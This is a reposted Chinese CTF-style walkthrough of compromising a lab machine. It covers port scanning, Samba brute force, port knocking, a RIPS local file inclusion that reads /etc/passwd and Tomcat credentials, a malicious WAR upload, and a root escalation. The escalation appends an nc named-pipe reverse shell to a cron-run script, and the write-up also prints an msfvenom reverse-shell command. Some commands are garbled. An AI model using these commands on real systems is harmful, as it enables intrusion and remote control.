nmap扫下端口
nmapsS –sV 192.168.8.144
发现22、80是关的,应该需要敲门
在这里插入图片描述

8080是tomcat页面,但是manager密码控制台进不去,
提示主机管理器 Web 应用仅限于角色为“admingui”的用户用户在中定义。/etc/tomcat7/tomcatusers.xml
在这里插入图片描述

web暂时没发现线索,尝试攻击Samba
smbclient -NL 192.168.8.144 看一下共享名,发现存在qiu用户
在这里插入图片描述

爆破qiu密码
hydra -l qiu -P /usr/share/wordlists/fasttrack.txt -e nsr smb://192.168.8.144
发现 密码为password
smbclient \192.168.8.144qiu -U qiu
在这里插入图片描述

发现config文件get本地

在这里插入图片描述

查看config中的配置发现开80端口需要敲157、27391、4端口 。开20端口要敲17301、28504、9999

在这里插入图片描述

knock 192.168.8.144 159 27391 4 17301 28504 9999 用knock进行敲门打开80和22
在这里插入图片描述

在这里插入图片描述

dirb爆一下目录发现robots文件得到mercy、nomercy两个目录

在这里插入图片描述

nomercy目录下是rips0.53的页面
在这里插入图片描述

exploitdb里搜素rips0.53漏洞发现存在本地文件包含漏洞
https://www.exploit-db.com/exploits/18660
在这里插入图片描述

成功包含passed
http://192.168.8.144/nomercy/windows/code.php?file=…/…/…/…/…/…/etc/passwd
在这里插入图片描述

尝试包含一开始获取到的/tomcatusers.xml
http://192.168.8.144/nomercy/windows/code.php?file=…/…/…/…/…/…/etc/tomcat7/tomcat-users.xml
在这里插入图片描述

username=“thisisasuperduperlonguserpassword=”heartbreakisinevitable“成功登录tomcat控制
在这里插入图片描述

上传jsp马,需要提前打个war包,也可用msf生成一个
msfvenom –p linux/x86/shell_reverse_tcp LHOST=192.168.8.130 LPORT=7777 -f war -o shell.war

在这里插入图片描述

成功上传
在这里插入图片描述

tnmedxmp.jsp
监听端口
在这里插入图片描述

python生成交互shellpython -c ‘import pty;pty.spawn(“/bin/bash”)’
尝试su到fluffy用户
username=“fluffy” password=“freakishfluffybunny”
在/home/fluffy/.private/secrets发现timeclock权限为777
在这里插入图片描述

发现可以同步时间,推测应该会周期执行
在这里插入图片描述

直接写个反弹shell进去,等一小会
echorm -rf /tmp/p; mknod /tmp/p p; /bin/sh 0</tmp/p | nc 192.168.8.143 8888 1&gt;/tmp/p” &gt;&gt;timeclock
在这里插入图片描述

root用户确实有timeclock的定时任务
在这里插入图片描述

原文地址:https://blog.csdn.net/weixin_47311099/article/details/127867461

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。

如若转载,请注明出处:http://www.7code.cn/show_8045.html

如若内容造成侵权/违法违规/事实不符,请联系代码007邮箱:suwngjj01@126.com进行投诉反馈,一经查实,立即删除

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注